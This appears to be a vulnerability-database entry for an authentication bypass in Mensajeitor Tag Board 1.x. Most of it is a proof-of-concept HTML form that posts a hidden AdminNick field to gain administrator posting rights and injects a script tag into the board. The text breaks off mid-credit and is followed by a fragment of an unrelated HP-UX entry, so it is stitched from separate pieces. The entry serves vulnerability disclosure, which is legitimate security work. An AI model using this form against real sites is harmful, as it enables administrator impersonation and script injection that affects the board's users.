Mensajeitor Tag Board 1.x – Authentication Bypass
漏洞ID | 1054534 | 漏洞类型 | |
发布时间 | 2004-07-21 | 更新时间 | 2004-07-21 |
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漏洞平台 | PHP | CVSS评分 | N/A |
It has been reported that Mensajeitor Tag Board is affected by an authentication bypass vulnerability. This issue is due to a failure of the application to properly handle authentication controls.
Successful exploitation of this issue will allow an attacker to post messages to the affected tag board as an administrator, reportedly facilitating HTML injection and attacks.
< html>
< head>< title>Mensajeitor Exploit</title></head>
< body>
Inyeccion codigo en Mensajeitor =< v1.8.9 r1< br>< br>
< form name="form1" method="post" action="">
< input type="text" name="nick" size="10" value="Nick" maxlength="9">< br>
< input type="text" name="titulo" size="21" value="Mensaje">< br>
< input type="text" name="url" size="21" value="http://">< br>
< input type="hidden" name="AdminNick" value="si">< br>
Introduce codigo a insertar (</table> debe incluirse al principio)< br>
< input type="text" name="cadena_final" size="75%" value="</table>< script>alert('hacked ;)')</script>">< br>
< input type="submit" name="enviar" value="Enviar" class="form">< br>
MensajeitorPHP propiedad de aaff.< br>
By Jordi Corrales (Shell Security Group,
HP-UX movemail权限许可漏洞 漏洞ID 1207577 漏洞类型 未知 发布时间 1997-01-06 更新时间 1997-01-06 CVE编号 CVE-1999-1249 CNNVD-ID CNNVD-199701-044 漏洞平台 N/A C…
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